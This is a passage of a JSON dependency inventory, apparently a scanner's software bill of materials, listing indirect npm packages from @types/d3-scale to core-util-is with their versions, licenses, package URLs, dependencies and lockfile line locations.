"a9a7a5ff5243c1a3" }, "Version": "3.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2858, "EndLine": 2863 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-scale@4.0.9", "Name": "@types/d3-scale", "Identifier": { "PURL": "pkg:npm/%40types/d3-scale@4.0.9", "UID": "cb3f78a66dabd70c" }, "Version": "4.0.9", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/d3-time@3.0.4" ], "Locations": [ { "StartLine": 2864, "EndLine": 2872 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-shape@3.1.8", "Name": "@types/d3-shape", "Identifier": { "PURL": "pkg:npm/%40types/d3-shape@3.1.8", "UID": "270d1653f06304b8" }, "Version": "3.1.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/d3-path@3.1.1" ], "Locations": [ { "StartLine": 2873, "EndLine": 2881 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-time@3.0.4", "Name": "@types/d3-time", "Identifier": { "PURL": "pkg:npm/%40types/d3-time@3.0.4", "UID": "be66b4addfe55e7a" }, "Version": "3.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2882, "EndLine": 2887 } ], "AnalyzedBy": "npm" }, { "ID": "@types/d3-timer@3.0.2", "Name": "@types/d3-timer", "Identifier": { "PURL": "pkg:npm/%40types/d3-timer@3.0.2", "UID": "95b7d7a07d2fd10f" }, "Version": "3.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2888, "EndLine": 2893 } ], "AnalyzedBy": "npm" }, { "ID": "@types/jsonwebtoken@9.0.10", "Name": "@types/jsonwebtoken", "Identifier": { "PURL": "pkg:npm/%40types/jsonwebtoken@9.0.10", "UID": "c65e23d8d5cbeb08" }, "Version": "9.0.10", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/ms@2.1.0", "@types/node@20.19.39" ], "Locations": [ { "StartLine": 2934, "EndLine": 2943 } ], "AnalyzedBy": "npm" }, { "ID": "@types/long@4.0.2", "Name": "@types/long", "Identifier": { "PURL": "pkg:npm/%40types/long@4.0.2", "UID": "4858c741b877e4e0" }, "Version": "4.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2944, "EndLine": 2950 } ], "AnalyzedBy": "npm" }, { "ID": "@types/ms@2.1.0", "Name": "@types/ms", "Identifier": { "PURL": "pkg:npm/%40types/ms@2.1.0", "UID": "d48e775b550c5b8f" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2975, "EndLine": 2980 } ], "AnalyzedBy": "npm" }, { "ID": "@types/node@22.19.17", "Name": "@types/node", "Identifier": { "PURL": "pkg:npm/%40types/node@22.19.17", "UID": "480c2123c29a3c3b" }, "Version": "22.19.17", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "undici-types@6.21.0" ], "Locations": [ { "StartLine": 5533, "EndLine": 5541 } ], "AnalyzedBy": "npm" }, { "ID": "@types/request@2.48.13", "Name": "@types/request", "Identifier": { "PURL": "pkg:npm/%40types/request@2.48.13", "UID": "869d1017c8001095" }, "Version": "2.48.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/caseless@0.12.5", "@types/node@20.19.39", "@types/tough-cookie@4.0.5", "form-data@2.5.5" ], "Locations": [ { "StartLine": 3069, "EndLine": 3081 } ], "AnalyzedBy": "npm" }, { "ID": "@types/tough-cookie@4.0.5", "Name": "@types/tough-cookie", "Identifier": { "PURL": "pkg:npm/%40types/tough-cookie@4.0.5", "UID": "fde0cd6bdbfced1a" }, "Version": "4.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3170, "EndLine": 3176 } ], "AnalyzedBy": "npm" }, { "ID": "@types/ws@8.18.1", "Name": "@types/ws", "Identifier": { "PURL": "pkg:npm/%40types/ws@8.18.1", "UID": "8fd24df18e05eaa2" }, "Version": "8.18.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "@types/node@20.19.39" ], "Locations": [ { "StartLine": 3177, "EndLine": 3185 } ], "AnalyzedBy": "npm" }, { "ID": "abbrev@2.0.0", "Name": "abbrev", "Identifier": { "PURL": "pkg:npm/abbrev@2.0.0", "UID": "7ebfb48a1322c943" }, "Version": "2.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3296, "EndLine": 3304 } ], "AnalyzedBy": "npm" }, { "ID": "abort-controller@3.0.0", "Name": "abort-controller", "Identifier": { "PURL": "pkg:npm/abort-controller@3.0.0", "UID": "32181bbecaca3ec8" }, "Version": "3.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "event-target-shim@5.0.1" ], "Locations": [ { "StartLine": 3305, "EndLine": 3317 } ], "AnalyzedBy": "npm" }, { "ID": "abs-svg-path@0.1.1", "Name": "abs-svg-path", "Identifier": { "PURL": "pkg:npm/abs-svg-path@0.1.1", "UID": "f56d8be7fa7b59f4" }, "Version": "0.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3318, "EndLine": 3323 } ], "AnalyzedBy": "npm" }, { "ID": "accepts@1.3.8", "Name": "accepts", "Identifier": { "PURL": "pkg:npm/accepts@1.3.8", "UID": "a9c129faacd93d3c" }, "Version": "1.3.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "mime-types@2.1.35", "negotiator@0.6.3" ], "Locations": [ { "StartLine": 3324, "EndLine": 3336 } ], "AnalyzedBy": "npm" }, { "ID": "agent-base@6.0.2", "Name": "agent-base", "Identifier": { "PURL": "pkg:npm/agent-base@6.0.2", "UID": "40442c8a9581d36c" }, "Version": "6.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "debug@4.4.3" ], "Locations": [ { "StartLine": 6159, "EndLine": 6171 }, { "StartLine": 9552, "EndLine": 9564 }, { "StartLine": 10019, "EndLine": 10030 } ], "AnalyzedBy": "npm" }, { "ID": "agent-base@7.1.4", "Name": "agent-base", "Identifier": { "PURL": "pkg:npm/agent-base@7.1.4", "UID": "5e9fb0d51d16556" }, "Version": "7.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3373, "EndLine": 3382 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-regex@5.0.1", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@5.0.1", "UID": "5cb6bac70ccd264c" }, "Version": "5.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3400, "EndLine": 3408 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-regex@6.2.2", "Name": "ansi-regex", "Identifier": { "PURL": "pkg:npm/ansi-regex@6.2.2", "UID": "7026bcee75094924" }, "Version": "6.2.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1435, "EndLine": 1446 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-styles@4.3.0", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@4.3.0", "UID": "d06cd1d057ea687c" }, "Version": "4.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-convert@2.0.1" ], "Locations": [ { "StartLine": 3409, "EndLine": 3423 } ], "AnalyzedBy": "npm" }, { "ID": "ansi-styles@6.2.3", "Name": "ansi-styles", "Identifier": { "PURL": "pkg:npm/ansi-styles@6.2.3", "UID": "fc622566e58e587a" }, "Version": "6.2.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 1447, "EndLine": 1458 } ], "AnalyzedBy": "npm" }, { "ID": "any-promise@1.3.0", "Name": "any-promise", "Identifier": { "PURL": "pkg:npm/any-promise@1.3.0", "UID": "2adbd9d40d27dc0b" }, "Version": "1.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3424, "EndLine": 3429 } ], "AnalyzedBy": "npm" }, { "ID": "anymatch@3.1.3", "Name": "anymatch", "Identifier": { "PURL": "pkg:npm/anymatch@3.1.3", "UID": "f0dd5cd624ce9f8" }, "Version": "3.1.3", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "normalize-path@3.0.0", "picomatch@2.3.2" ], "Locations": [ { "StartLine": 3430, "EndLine": 3442 } ], "AnalyzedBy": "npm" }, { "ID": "append-field@1.0.0", "Name": "append-field", "Identifier": { "PURL": "pkg:npm/append-field@1.0.0", "UID": "5321e9d0a7c0e6ea" }, "Version": "1.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3443, "EndLine": 3448 } ], "AnalyzedBy": "npm" }, { "ID": "arg@5.0.2", "Name": "arg", "Identifier": { "PURL": "pkg:npm/arg@5.0.2", "UID": "92e2335c9d9b548" }, "Version": "5.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3449, "EndLine": 3454 } ], "AnalyzedBy": "npm" }, { "ID": "array-flatten@1.1.1", "Name": "array-flatten", "Identifier": { "PURL": "pkg:npm/array-flatten@1.1.1", "UID": "1fd703b79f7101a1" }, "Version": "1.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3462, "EndLine": 3467 } ], "AnalyzedBy": "npm" }, { "ID": "arrify@2.0.1", "Name": "arrify", "Identifier": { "PURL": "pkg:npm/arrify@2.0.1", "UID": "d91a256606e8f2be" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3468, "EndLine": 3477 } ], "AnalyzedBy": "npm" }, { "ID": "async-retry@1.3.3", "Name": "async-retry", "Identifier": { "PURL": "pkg:npm/async-retry@1.3.3", "UID": "9ad114c0bfe66f34" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "retry@0.13.1" ], "Locations": [ { "StartLine": 3495, "EndLine": 3504 } ], "AnalyzedBy": "npm" }, { "ID": "asynckit@0.4.0", "Name": "asynckit", "Identifier": { "PURL": "pkg:npm/asynckit@0.4.0", "UID": "cd3f0709d26de45f" }, "Version": "0.4.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3505, "EndLine": 3510 } ], "AnalyzedBy": "npm" }, { "ID": "autoprefixer@10.5.0", "Name": "autoprefixer", "Identifier": { "PURL": "pkg:npm/autoprefixer@10.5.0", "UID": "7718563aaaf938af" }, "Version": "10.5.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "browserslist@4.28.2", "caniuse-lite@1.0.30001791", "fraction.js@5.3.4", "picocolors@1.1.1", "postcss-value-parser@4.2.0", "postcss@8.5.12" ], "Locations": [ { "StartLine": 3511, "EndLine": 3546 } ], "AnalyzedBy": "npm" }, { "ID": "axios@1.15.2", "Name": "axios", "Identifier": { "PURL": "pkg:npm/axios@1.15.2", "UID": "56d057767da7b39e" }, "Version": "1.15.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "follow-redirects@1.16.0", "form-data@4.0.5", "proxy-from-env@2.1.0" ], "Locations": [ { "StartLine": 3547, "EndLine": 3557 } ], "AnalyzedBy": "npm" }, { "ID": "balanced-match@1.0.2", "Name": "balanced-match", "Identifier": { "PURL": "pkg:npm/balanced-match@1.0.2", "UID": "a056fa1636630264" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3574, "EndLine": 3579 } ], "AnalyzedBy": "npm" }, { "ID": "base64-js@0.0.8", "Name": "base64-js", "Identifier": { "PURL": "pkg:npm/base64-js@0.0.8", "UID": "4b43187f18480ade" }, "Version": "0.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 6731, "EndLine": 6739 } ], "AnalyzedBy": "npm" }, { "ID": "base64-js@1.5.1", "Name": "base64-js", "Identifier": { "PURL": "pkg:npm/base64-js@1.5.1", "UID": "3c71b4deb6da91b8" }, "Version": "1.5.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3580, "EndLine": 3599 } ], "AnalyzedBy": "npm" }, { "ID": "base64id@2.0.0", "Name": "base64id", "Identifier": { "PURL": "pkg:npm/base64id@2.0.0", "UID": "89c8160020d6d675" }, "Version": "2.0.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3600, "EndLine": 3608 } ], "AnalyzedBy": "npm" }, { "ID": "baseline-browser-mapping@2.10.24", "Name": "baseline-browser-mapping", "Identifier": { "PURL": "pkg:npm/baseline-browser-mapping@2.10.24", "UID": "993b3b6c60f1f70c" }, "Version": "2.10.24", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3609, "EndLine": 3620 } ], "AnalyzedBy": "npm" }, { "ID": "basic-auth@2.0.1", "Name": "basic-auth", "Identifier": { "PURL": "pkg:npm/basic-auth@2.0.1", "UID": "38d110a9d6e306e9" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.1.2" ], "Locations": [ { "StartLine": 3621, "EndLine": 3632 } ], "AnalyzedBy": "npm" }, { "ID": "bcryptjs@2.4.3", "Name": "bcryptjs", "Identifier": { "PURL": "pkg:npm/bcryptjs@2.4.3", "UID": "8e36e4990487cb5e" }, "Version": "2.4.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3639, "EndLine": 3644 } ], "AnalyzedBy": "npm" }, { "ID": "bidi-js@1.0.3", "Name": "bidi-js", "Identifier": { "PURL": "pkg:npm/bidi-js@1.0.3", "UID": "35a87ab9ba9b22b1" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "require-from-string@2.0.2" ], "Locations": [ { "StartLine": 3645, "EndLine": 3653 } ], "AnalyzedBy": "npm" }, { "ID": "bignumber.js@9.3.1", "Name": "bignumber.js", "Identifier": { "PURL": "pkg:npm/bignumber.js@9.3.1", "UID": "76ae339798c843ca" }, "Version": "9.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3654, "EndLine": 3663 } ], "AnalyzedBy": "npm" }, { "ID": "binary-extensions@2.3.0", "Name": "binary-extensions", "Identifier": { "PURL": "pkg:npm/binary-extensions@2.3.0", "UID": "c23068d8ccb59587" }, "Version": "2.3.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3664, "EndLine": 3675 } ], "AnalyzedBy": "npm" }, { "ID": "body-parser@1.20.5", "Name": "body-parser", "Identifier": { "PURL": "pkg:npm/body-parser@1.20.5", "UID": "f68129b2d92df0fd" }, "Version": "1.20.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "bytes@3.1.2", "content-type@1.0.5", "debug@2.6.9", "depd@2.0.0", "destroy@1.2.0", "http-errors@2.0.1", "iconv-lite@0.4.24", "on-finished@2.4.1", "qs@6.15.1", "raw-body@2.5.3", "type-is@1.6.18", "unpipe@1.0.0" ], "Locations": [ { "StartLine": 3676, "EndLine": 3699 } ], "AnalyzedBy": "npm" }, { "ID": "brace-expansion@2.1.0", "Name": "brace-expansion", "Identifier": { "PURL": "pkg:npm/brace-expansion@2.1.0", "UID": "af2ab683fa7e5812" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "balanced-match@1.0.2" ], "Locations": [ { "StartLine": 4732, "EndLine": 4740 }, { "StartLine": 6502, "EndLine": 6510 } ], "AnalyzedBy": "npm" }, { "ID": "braces@3.0.3", "Name": "braces", "Identifier": { "PURL": "pkg:npm/braces@3.0.3", "UID": "e1f6491de8a2f450" }, "Version": "3.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "fill-range@7.1.1" ], "Locations": [ { "StartLine": 3741, "EndLine": 3752 } ], "AnalyzedBy": "npm" }, { "ID": "brotli@1.3.3", "Name": "brotli", "Identifier": { "PURL": "pkg:npm/brotli@1.3.3", "UID": "26b95af40200cc83" }, "Version": "1.3.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "base64-js@1.5.1" ], "Locations": [ { "StartLine": 3753, "EndLine": 3761 } ], "AnalyzedBy": "npm" }, { "ID": "browserify-zlib@0.2.0", "Name": "browserify-zlib", "Identifier": { "PURL": "pkg:npm/browserify-zlib@0.2.0", "UID": "dc9da3279fcef43c" }, "Version": "0.2.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "pako@1.0.11" ], "Locations": [ { "StartLine": 3762, "EndLine": 3770 } ], "AnalyzedBy": "npm" }, { "ID": "browserslist@4.28.2", "Name": "browserslist", "Identifier": { "PURL": "pkg:npm/browserslist@4.28.2", "UID": "cef81436a67eb5b0" }, "Version": "4.28.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "baseline-browser-mapping@2.10.24", "caniuse-lite@1.0.30001791", "electron-to-chromium@1.5.345", "node-releases@2.0.38", "update-browserslist-db@1.2.3" ], "Locations": [ { "StartLine": 3771, "EndLine": 3803 } ], "AnalyzedBy": "npm" }, { "ID": "buffer-equal-constant-time@1.0.1", "Name": "buffer-equal-constant-time", "Identifier": { "PURL": "pkg:npm/buffer-equal-constant-time@1.0.1", "UID": "1692094cd9c7b289" }, "Version": "1.0.1", "Licenses": [ "BSD-3-Clause" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3804, "EndLine": 3809 } ], "AnalyzedBy": "npm" }, { "ID": "buffer-from@1.1.2", "Name": "buffer-from", "Identifier": { "PURL": "pkg:npm/buffer-from@1.1.2", "UID": "8cde34d04e51064d" }, "Version": "1.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3810, "EndLine": 3815 } ], "AnalyzedBy": "npm" }, { "ID": "busboy@1.6.0", "Name": "busboy", "Identifier": { "PURL": "pkg:npm/busboy@1.6.0", "UID": "3c67ff971c36b1ea" }, "Version": "1.6.0", "Indirect": true, "Relationship": "indirect", "DependsOn": [ "streamsearch@1.1.0" ], "Locations": [ { "StartLine": 3816, "EndLine": 3826 } ], "AnalyzedBy": "npm" }, { "ID": "bytes@3.1.2", "Name": "bytes", "Identifier": { "PURL": "pkg:npm/bytes@3.1.2", "UID": "94e6e1694f740acf" }, "Version": "3.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3827, "EndLine": 3835 } ], "AnalyzedBy": "npm" }, { "ID": "call-bind-apply-helpers@1.0.2", "Name": "call-bind-apply-helpers", "Identifier": { "PURL": "pkg:npm/call-bind-apply-helpers@1.0.2", "UID": "f76cf4360b4b99d7" }, "Version": "1.0.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "es-errors@1.3.0", "function-bind@1.1.2" ], "Locations": [ { "StartLine": 3846, "EndLine": 3858 } ], "AnalyzedBy": "npm" }, { "ID": "call-bound@1.0.4", "Name": "call-bound", "Identifier": { "PURL": "pkg:npm/call-bound@1.0.4", "UID": "86b0bfd4902ddd17" }, "Version": "1.0.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "call-bind-apply-helpers@1.0.2", "get-intrinsic@1.3.0" ], "Locations": [ { "StartLine": 3859, "EndLine": 3874 } ], "AnalyzedBy": "npm" }, { "ID": "camelcase@5.3.1", "Name": "camelcase", "Identifier": { "PURL": "pkg:npm/camelcase@5.3.1", "UID": "5ddfca2cd8027175" }, "Version": "5.3.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3885, "EndLine": 3893 } ], "AnalyzedBy": "npm" }, { "ID": "camelcase-css@2.0.1", "Name": "camelcase-css", "Identifier": { "PURL": "pkg:npm/camelcase-css@2.0.1", "UID": "56256fd3cc2eb216" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3894, "EndLine": 3902 } ], "AnalyzedBy": "npm" }, { "ID": "caniuse-lite@1.0.30001791", "Name": "caniuse-lite", "Identifier": { "PURL": "pkg:npm/caniuse-lite@1.0.30001791", "UID": "42baa4809cd911d2" }, "Version": "1.0.30001791", "Licenses": [ "CC-BY-4.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 3903, "EndLine": 3922 } ], "AnalyzedBy": "npm" }, { "ID": "chokidar@3.6.0", "Name": "chokidar", "Identifier": { "PURL": "pkg:npm/chokidar@3.6.0", "UID": "355682d72aa1a1bb" }, "Version": "3.6.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "anymatch@3.1.3", "braces@3.0.3", "fsevents@2.3.3", "glob-parent@5.1.2", "is-binary-path@2.1.0", "is-glob@4.0.3", "normalize-path@3.0.0", "readdirp@3.6.0" ], "Locations": [ { "StartLine": 3972, "EndLine": 3995 } ], "AnalyzedBy": "npm" }, { "ID": "client-only@0.0.1", "Name": "client-only", "Identifier": { "PURL": "pkg:npm/client-only@0.0.1", "UID": "5a37df37a522d946" }, "Version": "0.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4008, "EndLine": 4013 } ], "AnalyzedBy": "npm" }, { "ID": "cliui@6.0.0", "Name": "cliui", "Identifier": { "PURL": "pkg:npm/cliui@6.0.0", "UID": "e3fc29e4430367f8" }, "Version": "6.0.0", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1", "wrap-ansi@6.2.0" ], "Locations": [ { "StartLine": 8170, "EndLine": 8180 } ], "AnalyzedBy": "npm" }, { "ID": "cliui@8.0.1", "Name": "cliui", "Identifier": { "PURL": "pkg:npm/cliui@8.0.1", "UID": "44577153b7afd839" }, "Version": "8.0.1", "Licenses": [ "ISC" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "string-width@4.2.3", "strip-ansi@6.0.1", "wrap-ansi@7.0.0" ], "Locations": [ { "StartLine": 4014, "EndLine": 4028 } ], "AnalyzedBy": "npm" }, { "ID": "clone@2.1.2", "Name": "clone", "Identifier": { "PURL": "pkg:npm/clone@2.1.2", "UID": "2ef0e8d413d0a516" }, "Version": "2.1.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4029, "EndLine": 4037 } ], "AnalyzedBy": "npm" }, { "ID": "clsx@2.1.1", "Name": "clsx", "Identifier": { "PURL": "pkg:npm/clsx@2.1.1", "UID": "860fe62a1599cca6" }, "Version": "2.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4038, "EndLine": 4046 } ], "AnalyzedBy": "npm" }, { "ID": "cluster-key-slot@1.1.2", "Name": "cluster-key-slot", "Identifier": { "PURL": "pkg:npm/cluster-key-slot@1.1.2", "UID": "93272ba097484907" }, "Version": "1.1.2", "Licenses": [ "Apache-2.0" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4047, "EndLine": 4055 } ], "AnalyzedBy": "npm" }, { "ID": "color-convert@2.0.1", "Name": "color-convert", "Identifier": { "PURL": "pkg:npm/color-convert@2.0.1", "UID": "24820f76ed277f23" }, "Version": "2.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.4" ], "Locations": [ { "StartLine": 4056, "EndLine": 4067 } ], "AnalyzedBy": "npm" }, { "ID": "color-name@1.1.4", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@1.1.4", "UID": "92033e7783c5c780" }, "Version": "1.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4068, "EndLine": 4073 } ], "AnalyzedBy": "npm" }, { "ID": "color-name@2.1.0", "Name": "color-name", "Identifier": { "PURL": "pkg:npm/color-name@2.1.0", "UID": "6924f70f47532648" }, "Version": "2.1.0", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 2261, "EndLine": 2269 } ], "AnalyzedBy": "npm" }, { "ID": "color-string@1.9.1", "Name": "color-string", "Identifier": { "PURL": "pkg:npm/color-string@1.9.1", "UID": "db1d00aa09de81ea" }, "Version": "1.9.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@1.1.4", "simple-swizzle@0.2.4" ], "Locations": [ { "StartLine": 4074, "EndLine": 4083 } ], "AnalyzedBy": "npm" }, { "ID": "color-string@2.1.4", "Name": "color-string", "Identifier": { "PURL": "pkg:npm/color-string@2.1.4", "UID": "8c3f450860129c2d" }, "Version": "2.1.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "color-name@2.1.0" ], "Locations": [ { "StartLine": 2270, "EndLine": 2281 } ], "AnalyzedBy": "npm" }, { "ID": "combined-stream@1.0.8", "Name": "combined-stream", "Identifier": { "PURL": "pkg:npm/combined-stream@1.0.8", "UID": "b0b485aae59ec66e" }, "Version": "1.0.8", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "delayed-stream@1.0.0" ], "Locations": [ { "StartLine": 4084, "EndLine": 4095 } ], "AnalyzedBy": "npm" }, { "ID": "commander@10.0.1", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@10.0.1", "UID": "65a2448c291b872a" }, "Version": "10.0.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4096, "EndLine": 4104 } ], "AnalyzedBy": "npm" }, { "ID": "commander@4.1.1", "Name": "commander", "Identifier": { "PURL": "pkg:npm/commander@4.1.1", "UID": "43d1edb4e2424e70" }, "Version": "4.1.1", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 9382, "EndLine": 9390 } ], "AnalyzedBy": "npm" }, { "ID": "concat-stream@1.6.2", "Name": "concat-stream", "Identifier": { "PURL": "pkg:npm/concat-stream@1.6.2", "UID": "f6eb2808fca671fc" }, "Version": "1.6.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "buffer-from@1.1.2", "inherits@2.0.4", "readable-stream@2.3.8", "typedarray@0.0.6" ], "Locations": [ { "StartLine": 4122, "EndLine": 4136 } ], "AnalyzedBy": "npm" }, { "ID": "config-chain@1.1.13", "Name": "config-chain", "Identifier": { "PURL": "pkg:npm/config-chain@1.1.13", "UID": "b310cec790dc9116" }, "Version": "1.1.13", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "ini@1.3.8", "proto-list@1.2.4" ], "Locations": [ { "StartLine": 4174, "EndLine": 4183 } ], "AnalyzedBy": "npm" }, { "ID": "content-disposition@0.5.4", "Name": "content-disposition", "Identifier": { "PURL": "pkg:npm/content-disposition@0.5.4", "UID": "9e487feb999d8a3d" }, "Version": "0.5.4", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "DependsOn": [ "safe-buffer@5.2.1" ], "Locations": [ { "StartLine": 4184, "EndLine": 4195 } ], "AnalyzedBy": "npm" }, { "ID": "content-type@1.0.5", "Name": "content-type", "Identifier": { "PURL": "pkg:npm/content-type@1.0.5", "UID": "d306d10a33b29b02" }, "Version": "1.0.5", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4196, "EndLine": 4204 } ], "AnalyzedBy": "npm" }, { "ID": "cookie@0.7.2", "Name": "cookie", "Identifier": { "PURL": "pkg:npm/cookie@0.7.2", "UID": "5801c71e7a6dd0c5" }, "Version": "0.7.2", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4836, "EndLine": 4844 }, { "StartLine": 5265, "EndLine": 5273 } ], "AnalyzedBy": "npm" }, { "ID": "cookie-signature@1.0.7", "Name": "cookie-signature", "Identifier": { "PURL": "pkg:npm/cookie-signature@1.0.7", "UID": "35470ee835f462a5" }, "Version": "1.0.7", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4205, "EndLine": 4210 } ], "AnalyzedBy": "npm" }, { "ID": "core-util-is@1.0.3", "Name": "core-util-is", "Identifier": { "PURL": "pkg:npm/core-util-is@1.0.3", "UID": "105c197829bc7dcd" }, "Version": "1.0.3", "Licenses": [ "MIT" ], "Indirect": true, "Relationship": "indirect", "Locations": [ { "StartLine": 4218, "EndLine": 4223 } ], "AnalyzedBy": "npm" }, { "ID": 